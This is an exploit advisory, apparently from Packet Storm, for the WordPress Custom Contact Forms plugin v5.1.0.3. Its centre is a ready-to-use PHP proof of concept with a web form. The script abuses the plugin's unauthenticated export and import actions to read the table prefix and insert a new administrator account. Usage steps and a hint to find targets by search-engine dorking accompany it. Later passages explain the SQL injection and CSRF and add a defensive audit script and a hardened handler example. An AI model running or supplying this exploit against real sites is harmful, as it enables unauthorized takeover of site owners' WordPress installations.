## https://sploitus.com/exploit?id=PACKETSTORM:189634
    =============================================================================================================================================
    | # Title     : WordPress Custom contact forms Plugin v 5.1.0.3 CSRF / SQL Injection                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: This code attempts to exploit a vulnerability in WordPress to add a new admin user.
       
       (linked: https://packetstorm.news/files/id/180885/ Linked CVE numbers: ),
    	
    [+] Save the code as poc.php.
    
    [+] Line 70: set your user & pass.
    
    [+] Usage : http://127.0.0.1/poc.php
    
    [+] Payload :
    
    <?php
    // Web interface for driving the exploit of the custom-contact-forms vulnerability in WordPress
    error_reporting(0);
    session_start();
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $target = $_POST['target'];
        $username = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, 10);
        $password = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 20);
        
        // Obtain the table prefix from the plugin's export action (ccf_export returns a SQL dump of its tables)
        function getTablePrefix($target) {
            $export_url = "$target/wp-admin/admin-post.php";
            
            $postdata = http_build_query([ 'ccf_export' => '1' ]);
            $opts = ['http' => ['method' => 'POST', 'content' => $postdata]];
            $context = stream_context_create($opts);
            $response = file_get_contents($export_url, false, $context);
            
            if (!$response || !preg_match('/insert into `(.+_)customcontactforms_fields`/i', $response, $matches)) {
                return null;
            }
            return $matches[1];
        }
        
        $table_prefix = getTablePrefix($target);
        if (!$table_prefix) {
            echo "<p>تعذر الحصول على بادئة الجدول!</p>";
            exit;
        }
        
        // SQL handed to the plugin's import action: inserts a user, then grants it the administrator capability
        $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password'));
                INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) 
                VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
        
        $boundary = md5(time());
        $data = "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.sql\"\r\n";
        $data .= "Content-Type: text/plain\r\n\r\n";
        $data .= "$sql\r\n";
        $data .= "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"ccf_merge_import\"\r\n\r\n1\r\n";
        $data .= "--$boundary--\r\n";
        
        $opts = ['http' => ['method' => 'POST', 'header' => "Content-Type: multipart/form-data; boundary=$boundary", 'content' => $data]];
        $context = stream_context_create($opts);
        $result = file_get_contents("$target/wp-admin/admin-post.php", false, $context);
        
        if ($result) {
            echo "<p>تم إنشاء مستخدم جديد بنجاح!<br>indoushka: <b>$username</b><br>packet2025strom: <b>$password</b></p>";
        } else {
            echo "<p>فشل في تنفيذ الهجوم!</p>";
        }
    }
    ?>
    
    <!DOCTYPE html>
    <html lang="ar">
    <head>
        <meta charset="UTF-8">
        <title>استغلال ثغرة ووردبريس</title>
    </head>
    <body>
        <h2>استغلال ثغرة ووردبريس - custom-contact-forms</h2>
        <form method="POST">
            <label>رابط الموقع المستهدف:</label>
            <input type="text" name="target" required>
            <button type="submit">تنفيذ</button>
        </form>
    </body>
    </html>
    
    
    Greetings to :=====================================================================================
    | jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
    ===================================================================================================
    
    
    Explanation:
    
    1. SQL Injection in the Code:
    
    The key part that exploits SQL Injection is this statement (two INSERTs in one string):
    
    $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password'));
            INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value)
            VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
    
    SQL Injection is being leveraged here in two key ways:
    
    Dynamic Table Prefix: The $table_prefix variable is dynamically set from
    the vulnerable WordPress site by exploiting the vulnerability in the
    "Custom Contact Forms" plugin. By using this dynamic table prefix, the
    attacker injects the actual table names into the SQL query. This is crucial
    because WordPress installations can use different table prefixes (such as
    wp_, wp123_, etc.), so exploiting this prefix injection allows the attacker
    to target any WordPress installation, regardless of its configuration.
    
    User and Meta Insertions: The attacker inserts values for the user_login
    and user_pass columns in the users table and inserts the capabilities
    metadata for the user into the usermeta table. The attacker injects
    arbitrary values directly into the SQL query, including the user_login,
    user_pass, and meta_value, allowing them to create a user with
    administrator privileges.
    
    Specifically, this line:
    
    INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password'));
    
    The attacker can control the $username and $password values by generating
    them randomly, ensuring that a new admin user is created.
    
    And this line:
    
    INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value)
    VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');
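    The serialized value written into the `{prefix}capabilities` row above is also the indicator a defender can audit for after the fact. The script below is an added example (it is not part of the advisory and not the plugin's code): it takes exported `usermeta` rows, decodes each capabilities value with `unserialize()` restricted to arrays, and reports any account that holds the administrator role but is not on a known baseline of expected admin user ids. The sample rows, the `wp_` prefix and the baseline `[1]` are constructed assumptions.

```php
<?php
// Added example (not from the advisory): audit wp_usermeta capability rows
// for administrator grants. The rows below are constructed sample data; in
// practice they would come from
//   SELECT user_id, meta_key, meta_value FROM wp_usermeta WHERE meta_key LIKE '%capabilities'
// with the table prefix assumed to be "wp_".

declare(strict_types=1);

/**
 * Decode a serialized WordPress capabilities array safely.
 * Returns the role names that are granted (e.g. ["administrator"]), or null
 * when the value is not a well-formed serialized array.
 */
function parseCapabilities(string $serialized): ?array
{
    // allowed_classes => false stops unserialize() from instantiating objects.
    $caps = @unserialize($serialized, ['allowed_classes' => false]);
    if (!is_array($caps)) {
        return null;
    }
    $roles = [];
    foreach ($caps as $role => $granted) {
        if ($granted === true || $granted === 1 || $granted === '1') {
            $roles[] = (string) $role;
        }
    }
    return $roles;
}

/**
 * Return findings for user_ids that hold the administrator role but are not
 * in the expected baseline, and for rows whose value does not parse.
 */
function findUnexpectedAdmins(array $rows, array $expectedAdminIds, string $prefix = 'wp_'): array
{
    $findings = [];
    foreach ($rows as $row) {
        if ($row['meta_key'] !== $prefix . 'capabilities') {
            continue; // other meta keys (sessions, settings) are irrelevant here
        }
        $roles = parseCapabilities($row['meta_value']);
        if ($roles === null) {
            $findings[] = ['user_id' => $row['user_id'], 'reason' => 'unparseable capabilities value'];
            continue;
        }
        if (in_array('administrator', $roles, true) && !in_array($row['user_id'], $expectedAdminIds, true)) {
            $findings[] = ['user_id' => $row['user_id'], 'reason' => 'administrator role outside baseline'];
        }
    }
    return $findings;
}

// Constructed sample rows: user 1 is the known admin, user 7 is an editor,
// user 42 carries the same serialized value the PoC writes and is not expected.
$sampleRows = [
    ['user_id' => 1,  'meta_key' => 'wp_capabilities', 'meta_value' => 'a:1:{s:13:"administrator";b:1;}'],
    ['user_id' => 7,  'meta_key' => 'wp_capabilities', 'meta_value' => 'a:1:{s:6:"editor";b:1;}'],
    ['user_id' => 42, 'meta_key' => 'wp_capabilities', 'meta_value' => 'a:1:{s:13:"administrator";b:1;}'],
    ['user_id' => 42, 'meta_key' => 'session_tokens',  'meta_value' => 'a:0:{}'],
];

foreach (findUnexpectedAdmins($sampleRows, [1]) as $finding) {
    printf("user_id %d: %s\n", $finding['user_id'], $finding['reason']);
}
```

    Run it with `php audit.php` against rows exported from the live database; a user id outside the baseline with the administrator role is exactly the artifact the import in the PoC leaves behind, and an unparseable value is worth a look because a hand-written capabilities string is not something WordPress itself produces.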
    
    
    2. CSRF (Cross-Site Request Forgery):
    
    The CSRF comes into play because the attacker is exploiting the WordPress
    site's functionality by sending a POST request to the site without the
    target user's knowledge or consent.
    
    The attacker crafts a malicious request (with the SQL injection and user
    creation data) and then sends it to the WordPress site via the
    admin-post.php endpoint.
    
    This request is sent through an HTML form (the form in the provided code),
    and the attacker only needs the target website's URL. If a logged-in
    WordPress user accesses this malicious page, it triggers the creation of
    the new user with admin privileges.
    
    The attack uses file_get_contents() to send the POST request directly to
    the wp-admin/admin-post.php endpoint. The handler behind it can be reached
    without any CSRF protection (such as a WordPress nonce) being checked, so
    the protections that could otherwise prevent this attack never apply.
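    For comparison, this is how a handler on the same endpoint should be written. The following is an added example, not the plugin's own code: a minimal WordPress import handler that registers only the logged-in hook, checks a capability and a nonce before reading any upload, and never executes uploaded text as SQL. It assumes it is loaded inside WordPress (as a plugin or mu-plugin); the action name `example_import`, the nonce action `example_import_nonce`, the table `example_forms` and the function names are illustrative assumptions.

```php
<?php
// Added example, not the plugin's own code: a minimal WordPress admin-post
// import handler showing the unsafe registration pattern beside a hardened
// one. Assumes it is loaded inside WordPress (plugin or mu-plugin). The action
// name "example_import", the nonce action "example_import_nonce", the table
// "example_forms" and the function names are illustrative assumptions.

// --- Unsafe pattern (shown as comments only) ---
// add_action('admin_post_nopriv_example_import', 'example_import_unsafe');
// add_action('admin_post_example_import',        'example_import_unsafe');
// admin_post_nopriv_{action} fires for visitors who are NOT logged in, and a
// handler with no nonce or capability check then runs for any POST that names
// the action; passing the upload to the database as raw SQL is what lets a
// single request create an administrator, as the advisory describes.

// --- Hardened pattern ---
// Only the logged-in hook is registered. With no admin_post_nopriv_ hook,
// an unauthenticated POST for this action reaches no handler at all.
add_action('admin_post_example_import', 'example_import_secure');

function example_import_secure(): void
{
    // 1. Authorization: only users who may manage the site can import.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', ['response' => 403]);
    }

    // 2. CSRF: the request must carry a nonce issued to this user for this
    //    action. check_admin_referer() ends the request with 403 when the
    //    nonce is missing, expired, or was issued to a different user.
    check_admin_referer('example_import_nonce');

    // 3. Input validation: a genuine upload of bounded size.
    if (empty($_FILES['import_file']) || !is_uploaded_file($_FILES['import_file']['tmp_name'])) {
        wp_die('No import file supplied.', '', ['response' => 400]);
    }
    if ((int) $_FILES['import_file']['size'] > 1024 * 1024) {
        wp_die('Import file too large.', '', ['response' => 413]);
    }
    $records = json_decode((string) file_get_contents($_FILES['import_file']['tmp_name']), true);
    if (!is_array($records)) {
        wp_die('Import file is not valid JSON.', '', ['response' => 400]);
    }

    // 4. Never execute uploaded text as SQL. Write structured records through
    //    $wpdb->insert(), which escapes values and confines the import to the
    //    plugin's own table; it cannot touch users or usermeta.
    global $wpdb;
    foreach ($records as $record) {
        $wpdb->insert(
            $wpdb->prefix . 'example_forms',
            [
                'name'   => sanitize_text_field((string) ($record['name'] ?? '')),
                'fields' => wp_json_encode($record['fields'] ?? []),
            ],
            ['%s', '%s']
        );
    }

    wp_safe_redirect(add_query_arg('imported', count($records), admin_url('admin.php?page=example')));
    exit;
}
```

    The form that submits to `admin_url('admin-post.php')` has to include `wp_nonce_field('example_import_nonce')` and a hidden `action` field set to `example_import`. A request like the PoC's multipart body carries neither a login cookie nor a `_wpnonce` value, so it is refused at steps 1 and 2 before the uploaded file is ever read; step 4 is the defence in depth that makes the import harmless even for a legitimate, authenticated admin who uploads a hostile file.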